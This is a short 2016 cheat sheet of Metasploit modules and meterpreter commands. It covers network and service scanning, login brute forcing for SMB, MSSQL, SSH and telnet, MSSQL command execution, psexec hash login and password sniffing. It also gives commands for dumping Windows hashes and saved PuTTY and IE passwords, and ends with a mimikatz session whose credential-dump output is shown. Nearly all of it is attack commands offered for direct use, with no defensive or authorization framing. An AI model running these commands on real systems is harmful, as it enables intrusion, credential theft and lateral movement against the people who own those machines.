2016-07-24 16:52:48

Commonly used Metasploit modules

Web crawler:
auxiliary/crawler/msfcrawler
Find live hosts:
meterpreter > run arp_scanner -r
Find anonymous FTP servers on the LAN:
auxiliary/scanner/ftp/anonymous
Find passwords saved by PuTTY:
meterpreter > run enum_putty
Find passwords saved by IE:
meterpreter > run post/windows/gather/enum_ie
Windows passwords:
meterpreter > run windows/gather/smart_hashdump
Get local routes:
meterpreter > run get_local_subnets
Brute force:
use auxiliary/scanner/mssql/mssql_login
Execute cmd through MSSQL:
use auxiliary/admin/mssql/mssql_exec
Port scanning:
auxiliary/scanner/portscan
ACK firewall scan:
scanner/portscan/ack
FTP bounce port scan:
scanner/portscan/ftpbounce
SYN port scan:
scanner/portscan/syn
TCP port scan:
scanner/portscan/tcp
TCP "Xmas" port scan:
scanner/portscan/xmas
SMB scanning
SMB enumeration:
auxiliary/scanner/smb/smb_enumusers
Return DCERPC information:
auxiliary/scanner/smb/pipe_dcerpc_auditor
Scan for the SMB2 protocol:
auxiliary/scanner/smb/smb2
Scan SMB shared files:
auxiliary/scanner/smb/smb_enumshares
Enumerate users on the system:
auxiliary/scanner/smb/smb_enumusers
SMB login:
auxiliary/scanner/smb/smb_login
SMB login (log in using the MD5 hash value):
use windows/smb/psexec
Scan group users:
auxiliary/scanner/smb/smb_lookupsid
Scan the system version:
auxiliary/scanner/smb/smb_version
MSSQL scanning (ports TCP 1433, UDP 1434)
MSSQL enumeration:
admin/mssql/mssql_enum
MSSQL command execution:
admin/mssql/mssql_exec
MSSQL queries:
admin/mssql/mssql_sql
MSSQL login tool:
scanner/mssql/mssql_login
Test for the presence of MSSQL and gather information:
scanner/mssql/mssql_ping
There is also an mssql_payload module, used for exploitation.
SMTP scanning
SMTP enumeration:
auxiliary/scanner/smtp/smtp_enum
Scan SMTP version:
auxiliary/scanner/smtp/smtp_version
SNMP scanning
Scan devices via SNMP:
auxiliary/scanner/snmp/community
SSH scanning
SSH login:
auxiliary/scanner/ssh/ssh_login
SSH public-key authentication login:
auxiliary/scanner/ssh/ssh_login_pubkey
Scan SSH version:
auxiliary/scanner/ssh/ssh_version
Telnet scanning
Telnet login:
auxiliary/scanner/telnet/telnet_login
Scan telnet version:
auxiliary/scanner/telnet/telnet_version
TFTP scanning
Scan for files on TFTP:
auxiliary/scanner/tftp/tftpbrute
FTP version scanning:
scanner/ftp/anonymous
ARP scanning:
auxiliary/scanner/discovery/arp_sweep
Scan for hosts with UDP services:
auxiliary/scanner/discovery/udp_probe
Detect common UDP services:
auxiliary/scanner/discovery/udp_sweep
Sniff passwords:
auxiliary/sniffer/psnuffle
SNMP scanning:
scanner/snmp/community
VNC scanning, no-authentication scan:
scanner/vnc/vnc_none_auth
Capturing passwords with mimikatz in Metasploit
meterpreter > load mimikatz   // load the French wonder tool (mimikatz)
Loading extension mimikatz...success.
meterpreter > msv
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving msv credentials
msv credentials
===============
AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;62271  NTLM       K8ANTI-B2B9B81C  Administrator     lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;53697  NTLM                                          n.s. (Credentials KO)
0;999    NTLM       WORKGROUP        K8ANTI-B2B9B81C$  n.s. (Credentials KO)
meterpreter > kerberos
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;62271  NTLM       K8ANTI-B2B9B81C  Administrator     
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   
0;53697  NTLM                                          
0;999    NTLM       WORKGROUP        K8ANTI-B2B9B81C$  
meterpreter >
